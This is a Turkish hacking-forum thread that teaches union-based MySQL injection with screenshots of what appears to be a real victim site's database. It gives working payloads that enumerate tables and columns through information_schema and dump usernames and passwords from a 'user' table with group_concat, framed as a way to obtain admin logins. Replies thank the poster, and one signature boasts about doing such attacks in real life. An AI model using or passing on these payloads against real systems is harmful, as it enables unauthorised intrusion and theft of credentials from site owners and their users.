İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Görsel MySQL Injection //

26-01-2014 09:33
#1
ALcatraz' - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2013
Nereden:
İstanbul
Mesajlar:
4.269
Teşekkür (Etti):
968
Teşekkür (Aldı):
1755
Konular:
1022
Ticaret:
(0) %
Selamun aleykum arkadaşlar ;

MySQL İnjection u Bu Kez Sadece Kodlarla Değilde, Görsel Olarak Anlatmaya Çalıştım, Mantığı Kavramak İçin Yararlı Olacağını Düşünüyorum...Database ye SQL Kasarken Girdim
İşte Versiyon 4 Database



tabloda Kırmızı ile Belirttiğim yer bizim şu kodla aldığımız;

union select table_name from information_schema.tables
Tablo Adlarımız tablo isimlerimiz...

# Article
# Article Stock
#Article Text
# Category
# Transaction
# Firma
# News
# News_Preview
# Projekt
# user

Evet Tablolarımız bunlar...
Eğer admin Login bilgilerini almak istiyorsanız Malum Tablo adı user
User Tablomuzun açılmış görüntüsü...



Evet Kırmızı kutu içerisinde belirttiğim yerler kolon isimleri. Yani Biz bunu normal injectionda kod halinde şöyle alıyoruz...
union select column_name from information_schema.columns where table_name=’user’
Görüntüde gördüğümüz Kolon isimlerimiz...

# id
# Username
# Password
# Nachname
# Vorname
# email
# status
# datum

Malum Kolonlarımız Username ve Password
Username ve Password Kolonlarının açılmış Hali ;





Gördüğünüz Gibi Username Password Email Gibi Malum Kolonların İçindeki Bilgiler Ortaya Çıktı
Biz Bunu Normal İnjectionda Şu kodla alırız...
username için ;
union select username from user

Password için ;
union select Password from user
Eğer İkisini Aynı anda almak İstersek;
union select group_concat(username,0x3a,password) from user

Son Olarak Sitedeki Hali Şudur Arkadaşlar




Gördüğünüz Gibi Yukarıdaki Databasedeki Herşey İnjection ile de Ekrana Vurdu
Arkadaşlar Bildiğiniz Gibi Veriyon 4 Access e benzer Tahmin İşidir.
Sizlere Tablo adlarını ve kolon adlarını İjection ilede göstermek isterdim ama malum vs.4

Eğer Versiyon 5 Database ine girebilirsem onuda konunu devamına eklemeyi isterim...
Kullanıcı İmzası
En çok ne zoruma gidiyor biliyor musun? "Ülkem" diye kaydetmiştin beni telefonuna. Kalbimi parçalara ayırdın, hani vatan bölünmezdi?

Yokluğun bilinç altımdayken , varlığın kimin altında merak ediyorum.
IIKeSeRII Teşekkür etti.

26-01-2014 13:06
#2
IIKeSeRII - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Nereden:
İstanbul
Mesajlar:
341
Teşekkür (Etti):
10
Teşekkür (Aldı):
13
Konular:
10
Ticaret:
(0) %
Yararlı bilgi.
Teşekkürler ALcatraz'.
Kullanıcı İmzası
Sql İnjection= %35

Sanal da Bunları Yapabiliyorsak;
Gerçekte Neler Yapabiliriz Siz Düşünün..



█║▌│█│║▌║││█║▌║▌║

Tüm Hakları Saklıdır © 2014


26-01-2014 14:51
#3
co admir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2013
Mesajlar:
1.872
Teşekkür (Etti):
468
Teşekkür (Aldı):
718
Konular:
473
Ticaret:
(0) %
Alıntıdır diye yazsaydın dahada güzel olurdu...Eline sağlık

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı